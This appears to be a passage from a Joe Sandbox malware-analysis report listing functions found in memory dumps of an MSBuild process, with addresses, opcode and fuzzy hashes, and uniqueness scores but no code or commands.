                                                                                                                                                                                                                                                                  • Instruction ID: 53517f001437bf9e900a03ab6d3745f836f43bad4553068b7a650f2fb740fb79
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85c550d57d7d04e976de9f4033cd2d17a53dcbcbf37ae774952b7b3b7c6bfbf8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69D15672909786DFD716DF38C98AB823FB5F792324B08438EC9A193496D339211ACF45
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0139E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: cb7bd5d65c8a313430503e77cb76a359d2bb4a93e0cae0e1e8ac588988c0062c
                                                                                                                                                                                                                                                                  • Instruction ID: 7bae087556fd260399b5f6f6c66dc915a24b4d8bcc3d193277f9171abd4c5dbf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb7bd5d65c8a313430503e77cb76a359d2bb4a93e0cae0e1e8ac588988c0062c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27910431A00626DBEF24DB6DC444BBEBBE6EF9471CF154069E905AB390E634D901C791
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01381131 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 26a2c137fccd69c8e4eb7d5ede47e7558759ee312deb7170de3841cdec03baa2
                                                                                                                                                                                                                                                                  • Instruction ID: 7513f32066b8a855b5db69ef48302a341eb7d6e589f4e169feee7df085ba9c4b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26a2c137fccd69c8e4eb7d5ede47e7558759ee312deb7170de3841cdec03baa2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAB111B16093418FD754CF28C480A5ABBF5BB88308F184A6EF99AD7352D731E946CB42
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013B4750 Relevance: .3, Instructions: 251COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                                                                                                                                                                                                                  • Instruction ID: ca8fe45d8ffafd9abab90c240888c89a1a40b7faaa549df70991746b454eb013
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96814B21A042998BEB214EACC8C12FDBF64FF5220CB28467ED753CBB43D265D946C795
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013CDBF9 Relevance: .2, Instructions: 244COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                                                                                                                                                                                                                                  • Instruction ID: 065457002289d84710a5efff56b41719e0f7020ac6cf142ab769d585efbf1014
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01915771510A068FE725CF7DC889662BFE0FF55728B148A2DE5EAD76A0C335E911CB40
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0144F7B0 Relevance: .2, Instructions: 242COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a35768380e85f8d7c908cea64b82970373cc99b46ec6b5eb8ddf8321b2f094c1
                                                                                                                                                                                                                                                                  • Instruction ID: 9de68654890647487ce981781887f6e0496f03e9d20eec837e6559afe59ca7e5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a35768380e85f8d7c908cea64b82970373cc99b46ec6b5eb8ddf8321b2f094c1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2691F331A00616ABFB11CF2DC98076BBBE1EF58314F05857AE955DB3A2D734E909CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0144F43F Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 5cdecefa418ac2a30dcf7913775ae7586877274ea504ad44f4d0764a69033fbc
                                                                                                                                                                                                                                                                  • Instruction ID: 82791a19472d39f41be3314ea1e625684c3d7f291ee56f9cb3a8b7af61f1e277
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cdecefa418ac2a30dcf7913775ae7586877274ea504ad44f4d0764a69033fbc
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D991C372A101159FDB18CF7DC8906BEBBF1EF88310B1A817AD815EB3A6DA34D905CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014481CC Relevance: .2, Instructions: 232COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: f5a34f3b3759b60c63558f077ccd69a6e4b11372746c648ee07b93e85545fb8e
                                                                                                                                                                                                                                                                  • Instruction ID: 7327ff35afe768bcc6308fd5f67b5c669abb7565dbe741b626a39164911faa50
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5a34f3b3759b60c63558f077ccd69a6e4b11372746c648ee07b93e85545fb8e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E81B571E0052A9BDB14CFADC8805BEB7F1FF88214B18422BD921E77A4E775D952CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01390E59 Relevance: .2, Instructions: 231COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: fb2e6a2931bf5625f41fd36bfced3c71e2d01360082fc12551c02c06bf63f607
                                                                                                                                                                                                                                                                  • Instruction ID: b8100da7d3efa115099c20b751c21a3c6637a5973eaadd9eefbfefac30770c40
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb2e6a2931bf5625f41fd36bfced3c71e2d01360082fc12551c02c06bf63f607
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E81B435A00519DFDF18CE5EC8849AEBBBBFF85218B288295E8159B345D730E945CF90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0143E4F6 Relevance: .2, Instructions: 224COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 68b251d62141ed34e71c03fe35057be9fc2a7cd17ae4912ecebcfb7fd2f57228
                                                                                                                                                                                                                                                                  • Instruction ID: c521c6a1c58aabf947c3051a828ee9d616969697957127e9e7c868fb922a0f84
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68b251d62141ed34e71c03fe35057be9fc2a7cd17ae4912ecebcfb7fd2f57228
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA81BF72A01215DBCB28CF99C5906AEFBF1EF88310B59816AD816EB395D730DD41CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0041DE88 Relevance: .2, Instructions: 224COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 86dcf07eeca4501d32bb37436a72bdf6e96f757c6f0ecd1a7a809ac3f3cf218f
                                                                                                                                                                                                                                                                  • Instruction ID: e641fee7a5dd7cbf1cdd4d5157188dc685e520d64e6bf3d92fc9dc06de8ce600
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86dcf07eeca4501d32bb37436a72bdf6e96f757c6f0ecd1a7a809ac3f3cf218f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BB19772909791DFDB16DF38C98AB823FB6F782324B04438EC9A193596D339215ACF45
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0143B52F Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                                                                                                                                                                                  • Instruction ID: d95a3f87c220ef7bc09044168812a3a7827d18b1f507179278384274747d609d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11719E35A0021A9BDB22CF69C481BBFBBF5EF98754F58411BE940EB361E334D9418B90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0144AB40 Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                                                                                                                  • Instruction ID: 607b650657676311eb25dd767db11d80172d097f61725f9cb3ef083d2bf35a7e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A81A371A002469FEF19CF99C490AAEBBF2FF88310F24856ED9169B355D734D902CB44
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013AD090 Relevance: .2, Instructions: 217COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                                                                                                                                                                                  • Instruction ID: e75c06723d48a8e41e560bb97e79865a4a9bd975d558d39531e0428a9f698c59
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54816172E002298FDF15CF9CC9847AEBBF2EB84318F19417AD915B7784D631A9408B91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013BE284 Relevance: .2, Instructions: 212COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: d25d292924c623d08fd0bbe5f1df1a71077a11f200ad4d4dc51a75a5627c15c1
                                                                                                                                                                                                                                                                  • Instruction ID: 34e470c31d9e931506407d59e3b9b5dfb8c7ca5c75f7cebad2a5a786f9093d2d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d25d292924c623d08fd0bbe5f1df1a71077a11f200ad4d4dc51a75a5627c15c1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1814F71A00609AFDB25CFADC880BEEBBB9FF48358F14442DE659A7650E730AC45CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013AB950 Relevance: .2, Instructions: 209COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 5ec4ada5df6bc6f26d5552c09d8e9229ac0596e6460a510f30d724167ed1d98b
                                                                                                                                                                                                                                                                  • Instruction ID: 8d293197cefb961bb18f761526eb296a39d7300c27eceec6eba112e235e931a2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ec4ada5df6bc6f26d5552c09d8e9229ac0596e6460a510f30d724167ed1d98b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B97114302003648FF724CE2AC894736B7E6EB8471DF94856EE996CB5D8D735E802CB60
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0143DAC6 Relevance: .2, Instructions: 202COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: dcfb44c503d146263c4682726ee9dfa3d6475db8c375c688d957817861fc6ecd
                                                                                                                                                                                                                                                                  • Instruction ID: ad5c3ac9a40fc559f35ebfdcff702bbbe5053f28a1168e10211101874d6dc0ab
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dcfb44c503d146263c4682726ee9dfa3d6475db8c375c688d957817861fc6ecd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20818A70D002459FDB25CFAAC444AABBBF1EF8D700F80845AE496AB366D374D846DF60
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014470E9 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: b3bc3fa62d44e840bea1a4f02c580eaf14c10d0101dbf3027c1a994a5e234b8a
                                                                                                                                                                                                                                                                  • Instruction ID: 960266df73c4633c33bd10fbd88dd16ada39d921b1360fa459fb784b79f99c17
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3bc3fa62d44e840bea1a4f02c580eaf14c10d0101dbf3027c1a994a5e234b8a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0061B771E006179BEF11AFA9C8819BFB779BF64205F10442BE912A7350DB74D943CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0143F0CC Relevance: .2, Instructions: 199COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 5fa0583962607550099b7c75a24cab8e35058bf41b4b2a49f130791cbb08cfce
                                                                                                                                                                                                                                                                  • Instruction ID: 178e0601a4423712e7538b71f8e602b2dd2b99fb742bf12d06431fa41bbd73c0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fa0583962607550099b7c75a24cab8e35058bf41b4b2a49f130791cbb08cfce
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A719878E00722DBDB24CF99D08057AB7F1BB89204B64446FD98297760D371ED89DB92
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0140035C Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                                                                                                                  • Instruction ID: a334fe79b176385a221b6976897c98a4929c4105eed1373f3628e4b3e1a7cd0e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06716E71A00619AFDF11DFAAC944BDEBBB8FF58744F10456AE505E7290DB34EA01CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014162A0 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 5b3c6527675ffc265f6c85039c92e0c3e4049fe7e8cf55852be8f2f7a3bd945a
                                                                                                                                                                                                                                                                  • Instruction ID: ca9353eb7cfd535391955663445d7c976a5f36398b33a7c6469a4fe4d0ae51b3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5b3c6527675ffc265f6c85039c92e0c3e4049fe7e8cf55852be8f2f7a3bd945a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D710532240701AFEB32DF18C844F57BBA6FF40724F16452AE25A8B2B4DBB5E944CB54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01447A46 Relevance: .2, Instructions: 193COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 66aa06696347aed06f9cb5969fc29288af6bef320ed5fc4737d9b39a534e6cc7
                                                                                                                                                                                                                                                                  • Instruction ID: d91462e2b0de574c65dc2057734ea2a056bf7a785a10a402c8559ef6767081b8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 66aa06696347aed06f9cb5969fc29288af6bef320ed5fc4737d9b39a534e6cc7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83516975A001665BEB14DF6DC880ABBBBE2EF88315B14416AEE54DB395DB34C903C7A0
                                                                                                                                                                                                                                                                  Uniqueness

